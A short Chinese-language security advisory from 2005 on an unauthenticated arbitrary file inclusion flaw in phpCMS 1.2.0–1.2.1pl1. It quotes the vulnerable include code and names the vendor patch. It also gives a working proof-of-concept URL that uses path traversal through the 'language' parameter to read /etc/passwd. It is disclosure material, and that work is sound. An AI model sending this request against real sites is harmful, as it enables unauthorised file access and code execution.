phpCMS 1.2.x任意文件包含漏洞
2005-08-18
系统编号:
WAVDB-00533
影响版本:
phpCMS 1.2.0-1.2.1pl1
程序介绍:
Phpcms是一款基于 PHP+Mysql 架构的网站内容管理系统,也是一个开源的 PHP 开发平台。Phpcms 采用模块化方式开发,功能易用便于扩展,可面向大中型站点提供重量级网站建设解决方案。3年来,凭借 Phpcms 团队长期积累的丰富的Web开发及数据库经验和勇于创新追求完美的设计理念,使得 Phpcms 得到了近10万网站的认可,并且越来越多地被应用到大中型商业网站
漏洞分析:
phpCMS中存在服务器端任意文件包含漏洞,起因是在进行会话检查前调用了include语句。远程攻击者可以未经认证利用这个漏洞执行任意代码。
有漏洞的include调用位于class.layout_phpcms.php中:
if(isset($_GET['language']) && $_GET['language'] != '') {
include($PHPCMS_INCLUDEPATH.'/language.'.$_GET[language]);
[...]
漏洞利用:
http://vu1n.com/parser/parser.php?&phpcmsaction=FILEMANAGER&language=de/../../../../../../../etc/passwd
解决方案:
厂商补丁:
phpCMS
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载phpCMS 1.2.1pl2:
http://www.phpcms.de/download/
信息来源:
<*来源:sk0L (bmu@sec-consult.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111773774916907&w=2
*>